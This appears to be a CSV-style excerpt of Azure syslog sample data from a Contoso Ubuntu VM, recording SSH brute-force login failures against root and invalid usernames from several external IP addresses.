+14872,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:10:33,UbuntuDevEnv,2019-06-26 05:10:32,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for root from 58.242.82.13 port 27293 ssh2 [preauth],6370,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,27293,,
+14873,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:10:33,UbuntuDevEnv,2019-06-26 05:10:32,auth,UbuntuDevEnv,info,message repeated 5 times: [ Failed password for root from 58.242.82.13 port 27293 ssh2],6370,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,27293,,
+14874,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:10:33,UbuntuDevEnv,2019-06-26 05:10:32,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,6370,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+14875,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:10:33,UbuntuDevEnv,2019-06-26 05:10:32,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.242.82.13  user=root,6370,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,,0,
+14876,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:10:33,UbuntuDevEnv,2019-06-26 05:10:32,auth,UbuntuDevEnv,info,Disconnecting authenticating user root 58.242.82.13 port 27293: Too many authentication failures [preauth],6370,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,27293,,
+14877,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:10:36,UbuntuDevEnv,2019-06-26 05:10:35,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.242.82.13  user=root,6446,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,,0,
+14878,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:10:36,UbuntuDevEnv,2019-06-26 05:10:35,auth,UbuntuDevEnv,info,Invalid user vali from 196.41.208.238 port 35564,6449,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,vali,196.41.208.2,35564,,
+14879,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:10:36,UbuntuDevEnv,2019-06-26 05:10:35,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,6449,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+14880,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:10:36,UbuntuDevEnv,2019-06-26 05:10:35,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=196.41.208.238,6449,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,196.41.208.2,,0,
+14881,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:10:38,UbuntuDevEnv,2019-06-26 05:10:37,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 34900 ssh2,6446,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,34900,,
+14882,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:10:38,UbuntuDevEnv,2019-06-26 05:10:37,auth,UbuntuDevEnv,info,Failed password for invalid user vali from 196.41.208.238 port 35564 ssh2,6449,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,vali,196.41.208.2,35564,,
+14883,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:10:38,UbuntuDevEnv,2019-06-26 05:10:37,auth,UbuntuDevEnv,info,Received disconnect from 196.41.208.238 port 35564:11: Bye Bye [preauth],6449,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,196.41.208.2,35564,,
+14884,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:10:38,UbuntuDevEnv,2019-06-26 05:10:37,auth,UbuntuDevEnv,info,Disconnected from invalid user vali 196.41.208.238 port 35564 [preauth],6449,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,vali,196.41.208.2,35564,,
+14885,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:10:38,UbuntuDevEnv,2019-06-26 05:10:38,auth,UbuntuDevEnv,info,Invalid user luca from 200.6.188.38 port 36705,6491,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,luca,200.6.188.3,36705,,
+14886,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:10:38,UbuntuDevEnv,2019-06-26 05:10:38,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=200.6.188.38,6491,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,200.6.188.3,,0,
+14887,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:10:38,UbuntuDevEnv,2019-06-26 05:10:38,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,6491,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+14888,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:10:38,UbuntuDevEnv,2019-06-26 05:10:38,auth,UbuntuDevEnv,info,Invalid user citrix from 177.23.90.10 port 47212,6452,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,citrix,177.23.90.1,47212,,
+14889,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:10:38,UbuntuDevEnv,2019-06-26 05:10:38,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,6452,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+14890,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:10:38,UbuntuDevEnv,2019-06-26 05:10:38,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=177.23.90.10,6452,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,177.23.90.1,,0,
+14891,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:10:40,UbuntuDevEnv,2019-06-26 05:10:40,auth,UbuntuDevEnv,info,Failed password for invalid user luca from 200.6.188.38 port 36705 ssh2,6491,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,luca,200.6.188.3,36705,,
+14892,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:10:40,UbuntuDevEnv,2019-06-26 05:10:40,auth,UbuntuDevEnv,info,Received disconnect from 200.6.188.38 port 36705:11: Bye Bye [preauth],6491,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,200.6.188.3,36705,,
+14893,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:10:40,UbuntuDevEnv,2019-06-26 05:10:40,auth,UbuntuDevEnv,info,Disconnected from invalid user luca 200.6.188.38 port 36705 [preauth],6491,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,luca,200.6.188.3,36705,,
+14894,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:10:41,UbuntuDevEnv,2019-06-26 05:10:40,auth,UbuntuDevEnv,info,Failed password for invalid user citrix from 177.23.90.10 port 47212 ssh2,6452,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,citrix,177.23.90.1,47212,,
+14895,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:10:41,UbuntuDevEnv,2019-06-26 05:10:40,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 34900 ssh2,6446,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,34900,,
+14896,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:10:41,UbuntuDevEnv,2019-06-26 05:10:40,auth,UbuntuDevEnv,info,Received disconnect from 177.23.90.10 port 47212:11: Bye Bye [preauth],6452,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,177.23.90.1,47212,,
+14897,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:10:41,UbuntuDevEnv,2019-06-26 05:10:40,auth,UbuntuDevEnv,info,Disconnected from invalid user citrix 177.23.90.10 port 47212 [preauth],6452,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,citrix,177.23.90.1,47212,,
+14898,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:10:43,UbuntuDevEnv,2019-06-26 05:10:42,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 34900 ssh2,6446,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,34900,,
+14899,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:10:45,UbuntuDevEnv,2019-06-26 05:10:44,auth,UbuntuDevEnv,info,Invalid user sa from 140.143.223.242 port 37578,6520,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,sa,140.143.223.2,37578,,
+14900,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:10:45,UbuntuDevEnv,2019-06-26 05:10:44,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,6520,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+14901,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:10:45,UbuntuDevEnv,2019-06-26 05:10:44,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=140.143.223.242,6520,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,140.143.223.2,,0,
+14902,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:10:46,UbuntuDevEnv,2019-06-26 05:10:45,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 34900 ssh2,6446,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,34900,,
+14903,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:10:46,UbuntuDevEnv,2019-06-26 05:10:46,auth,UbuntuDevEnv,info,Failed password for invalid user sa from 140.143.223.242 port 37578 ssh2,6520,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,sa,140.143.223.2,37578,,
+14904,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:10:47,UbuntuDevEnv,2019-06-26 05:10:46,auth,UbuntuDevEnv,info,Received disconnect from 140.143.223.242 port 37578:11: Bye Bye [preauth],6520,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,140.143.223.2,37578,,
+14905,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:10:47,UbuntuDevEnv,2019-06-26 05:10:46,auth,UbuntuDevEnv,info,Disconnected from invalid user sa 140.143.223.242 port 37578 [preauth],6520,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,sa,140.143.223.2,37578,,
+14906,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:10:49,UbuntuDevEnv,2019-06-26 05:10:48,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 34900 ssh2,6446,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,34900,,
+14907,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:10:51,UbuntuDevEnv,2019-06-26 05:10:51,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.242.82.13  user=root,6446,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,,0,
+14908,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:10:51,UbuntuDevEnv,2019-06-26 05:10:51,auth,UbuntuDevEnv,info,Disconnecting authenticating user root 58.242.82.13 port 34900: Too many authentication failures [preauth],6446,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,34900,,
+14909,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:10:51,UbuntuDevEnv,2019-06-26 05:10:51,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 34900 ssh2,6446,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,34900,,
+14910,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:10:51,UbuntuDevEnv,2019-06-26 05:10:51,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for root from 58.242.82.13 port 34900 ssh2 [preauth],6446,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,34900,,
+14911,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:10:51,UbuntuDevEnv,2019-06-26 05:10:51,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,6446,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+14912,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:10:54,UbuntuDevEnv,2019-06-26 05:10:54,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.242.82.13  user=root,6566,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,,0,
+14913,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:10:56,UbuntuDevEnv,2019-06-26 05:10:56,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 42083 ssh2,6566,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,42083,,
+14914,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:11:02,UbuntuDevEnv,2019-06-26 05:11:01,auth,UbuntuDevEnv,info,message repeated 2 times: [ Failed password for root from 58.242.82.13 port 42083 ssh2],6566,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,42083,,
+14915,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:11:04,UbuntuDevEnv,2019-06-26 05:11:04,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 42083 ssh2,6566,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,42083,,
+14916,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:11:09,UbuntuDevEnv,2019-06-26 05:11:08,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,6566,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+14917,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:11:09,UbuntuDevEnv,2019-06-26 05:11:08,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.242.82.13  user=root,6566,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,,0,
+14918,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:11:09,UbuntuDevEnv,2019-06-26 05:11:08,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for root from 58.242.82.13 port 42083 ssh2 [preauth],6566,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,42083,,
+14919,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:11:09,UbuntuDevEnv,2019-06-26 05:11:08,auth,UbuntuDevEnv,info,Disconnecting authenticating user root 58.242.82.13 port 42083: Too many authentication failures [preauth],6566,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,42083,,
+14920,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:11:09,UbuntuDevEnv,2019-06-26 05:11:08,auth,UbuntuDevEnv,info,message repeated 2 times: [ Failed password for root from 58.242.82.13 port 42083 ssh2],6566,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,42083,,
+14921,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:11:12,UbuntuDevEnv,2019-06-26 05:11:12,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.242.82.13  user=root,6630,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,,0,
+14922,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:11:14,UbuntuDevEnv,2019-06-26 05:11:13,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 49455 ssh2,6630,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,49455,,
+14923,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:11:27,UbuntuDevEnv,2019-06-26 05:11:26,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for root from 58.242.82.13 port 49455 ssh2 [preauth],6630,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,49455,,
+14924,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:11:27,UbuntuDevEnv,2019-06-26 05:11:26,auth,UbuntuDevEnv,info,message repeated 5 times: [ Failed password for root from 58.242.82.13 port 49455 ssh2],6630,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,49455,,
+14925,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:11:27,UbuntuDevEnv,2019-06-26 05:11:26,auth,UbuntuDevEnv,info,Disconnecting authenticating user root 58.242.82.13 port 49455: Too many authentication failures [preauth],6630,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,49455,,
+14926,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:11:27,UbuntuDevEnv,2019-06-26 05:11:26,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.242.82.13  user=root,6630,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,,0,
+14927,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:11:27,UbuntuDevEnv,2019-06-26 05:11:26,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,6630,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+14928,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:11:30,UbuntuDevEnv,2019-06-26 05:11:29,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.242.82.13  user=root,6693,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,,0,
+14929,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:11:31,UbuntuDevEnv,2019-06-26 05:11:31,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 56094 ssh2,6693,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,56094,,
+14930,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:11:37,UbuntuDevEnv,2019-06-26 05:11:34,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 56094 ssh2,6693,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,56094,,
+14931,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:11:37,UbuntuDevEnv,2019-06-26 05:11:36,auth,UbuntuDevEnv,info,Invalid user mei from 45.55.190.46 port 33450,6660,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,mei,45.55.190.4,33450,,
